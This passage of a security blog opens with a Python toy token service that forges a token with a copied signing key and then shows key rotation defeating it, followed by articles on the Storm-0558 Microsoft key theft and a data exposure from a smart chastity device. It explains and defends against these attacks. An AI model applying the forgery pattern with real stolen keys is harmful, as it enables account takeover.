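    def __init__(self, keys: Dict[str, bytes]) -> None:
        self.keys = dict(keys)
        self.active = set(keys)

    def issue(self, kid: str, user: str, ttl: int = 3600) -> str:
        return sign_token(self.keys[kid], kid, {"sub": user, "exp": int(time.time()) + ttl})

    def verify(self, token: str) -> Optional[dict]:
        try:
            header, body, sig = token.split(".")
            kid = json.loads(b64u_decode(header)).get("kid")
            if kid not in self.active:          # rotated/revoked kid: reject even a valid signature
                return None
            # The key is chosen by the server-side kid list; 'alg' from the header is never trusted.
            expected = hmac.new(self.keys[kid], f"{header}.{body}".encode(), hashlib.sha256).digest()
            if not hmac.compare_digest(expected, b64u_decode(sig)):
                return None
            claims = json.loads(b64u_decode(body))
            return claims if claims.get("exp", 0) > time.time() else None
        except (ValueError, UnicodeDecodeError, AttributeError):
            return None

    def rotate(self, old_kid: str, new_kid: str, new_key: bytes) -> None:
        """Retire a key: every token under the old kid stops verifying, forged or not."""
        self.keys[new_kid] = new_key
        self.keys.pop(old_kid, None)
        self.active = {new_kid}


def leaked_key_scenario() -> dict:
    """Legitimate issue, forgery with a copy of the key obtained elsewhere
    (a crash dump, in the incident above), then rotation."""
    svc = TokenService({"2021-consumer-key": b"constructed-secret-not-a-real-key"})
    legit_user = svc.verify(svc.issue("2021-consumer-key", "alice@example.com"))["sub"]
    leaked = b"constructed-secret-not-a-real-key"          # attacker's copy of the same bytes
    forged = sign_token(leaked, "2021-consumer-key",
                        {"sub": "target@example.com", "exp": int(time.time()) + 86400})
    before = svc.verify(forged)
    svc.rotate("2021-consumer-key", "2023-consumer-key", b"another-constructed-secret")
    after = svc.verify(forged)
    return {
        "legit_user": legit_user,
        "forged_accepted_before_rotation": before is not None and before["sub"] == "target@example.com",
        "forged_accepted_after_rotation": after is not None,
    }


if __name__ == "__main__":
    print(leaked_key_scenario())
```

Nothing in the forged token looks wrong to the verifier, because nothing is wrong with it cryptographically; that is why the remaining controls are about where the key can travel (production versus debugging environments) and how fast a compromised kid can be dropped from the active set.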

The original Microsoft article noted that Storm-0558 “used an acquired [Microsoft account] key to forge tokens to access OWA and Outlook.com” but, crucially, did not say how the attackers were able to get at a key that would have been held in something like a real life version of the Fort Knox-like production environment, described by Microsoft as follows:

Microsoft maintains a highly isolated and restricted production environment. Controls for Microsoft employee access to production infrastructure include background checks, dedicated accounts, secure access workstations, and multi-factor authentication using hardware token devices. Controls in this environment also prevent the use of email, conferencing, web research and other collaboration tools which can lead to common account compromise vectors such as malware infections or phishing, as well as restricting access to systems and data using Just in Time and Just Enough Access policies.

Microsoft provides an answer—what it calls the “most probable mechanism”—to the riddle of how attackers breached all that protection, in its September 6 update.

It starts with a crash in a consumer signing system in 2021. A “crash dump” of the system, which included the key, was moved from the highly secure production environment into Microsoft’s debugging environment so that the cause of the crash could be investigated.

At some point after this occurred, Storm-0558 compromised a Microsoft engineer’s corporate account. That account had access to the debugging environment containing the crash dump with the key, and Storm-0558 was able to retrieve it from there without having to tackle the extensive security of the production environment.

Crucially, mechanisms that should have redacted the key material during the crash dump failed.

As you’d expect, Microsoft explains that it’s gone to great pains to beef up its security as a result, with numerous improvements in the way it handles and detects key materials, among other improvements.

The attack is a great example of just how advanced and persistent Advanced Persistent Threat (APT) actors can be, and why what Microsoft calls an “‘assume breach’ mindset” is so important in modern security. Computer networks are complicated and constantly in flux, and any organization can be breached. Assume you have been breached and monitor your environment accordingly.



Smart chastity device exposes sensitive user data

A security breach or inadvertent data exposure can be a devastating thing, not just for the company impacted but also for the people whose data is stolen or exposed to the world. The usual roll-call of “name, address, phone number and card details” is bad enough. If such things are tied to sensitive material or websites, it can be many times worse.

This is the case for a recent piece of Internet of Things technology tied to people’s love lives. TechCrunch reports that a wearable “chastity device” which allows the user’s partner to control it over the internet (via Android app) has exposed all manner of user details which includes:

  • Home addresses
  • IP addresses
  • Plaintext passwords
  • Email addresses
  • GPS coordinates

The researcher who discovered the issue claims it’s due to “several flaws” in the servers used by the company behind the device. Two of those vulnerabilities allowed the researcher to view no fewer than 10,000 user records. Despite contacting the organisation responsible on June 17, there’s been no word back and the issue is still out there.

Due to this potentially snowballing in a much worse way if the device name is made public, the details are so far being kept under wraps. As a result, if you use an internet connected chastity cage with your partner you won’t know for sure if you’re potentially affected or not.

At this point the story would usually end, and we’d advise you to think carefully when using IoT devices tied to more private aspects of your life. Well, not just yet! As it happens, the researcher was so frustrated by the lack of response that they took to compromising the device’s website and leaving the following message:

The site was disabled by a benevolent third party. [REDACTED] has left the site wide open, allowing any script kiddie to grab any and all customer information. This includes plaintext passwords and contrary to what [REDACTED] has claimed, also shipping addresses. You’re welcome! If you have paid for a physical unit and now cannot use it, I’m sorry. But there are thousands of people with accounts on here and I could not in good faith leave everything up for grabs.

We can’t condone breaking into a website and while trying to warn people is commendable, doing it in this fashion is likely to lead to more problems. If you want to keep a lid on the issue and not have it spill out across the internet, nothing can make something go public quicker than a spectacular web page defacement.

In this case, it doesn’t seem to have happened (yet). Even so, the message was gone a day later and the issue which led the researcher to so many user details still exists.

The above is bad enough. PayPal payment logs being exposed is possibly even worse, tying payments to email addresses. All of this alongside the GPS details for some users makes public activities that some folks will find embarrassing and not for public consumption. In specific circumstances this kind of thing can lead to harassment, trolling, and more.

With this in mind, we suggest an abundance of caution when making use of devices and technology similar to the above.

A product with no internet connection is safer from a data exposure perspective, but will naturally be somewhat less functional. If you need to make payments, use anonymous emails set up for exclusive use with sensitive devices. And keep in mind that enabling features like GPS will give potentially pinpoint accuracy to your daily movements.

We can only hope that the flaws in the above device are patched as soon as possible, but it’s possible that nothing will ever be done about it. While it should be quite shocking that such a personal device is able to be exploited in this way, IoT has been a flashpoint of poor security practices and lack of responsibility for years now. Buyer most definitely beware.

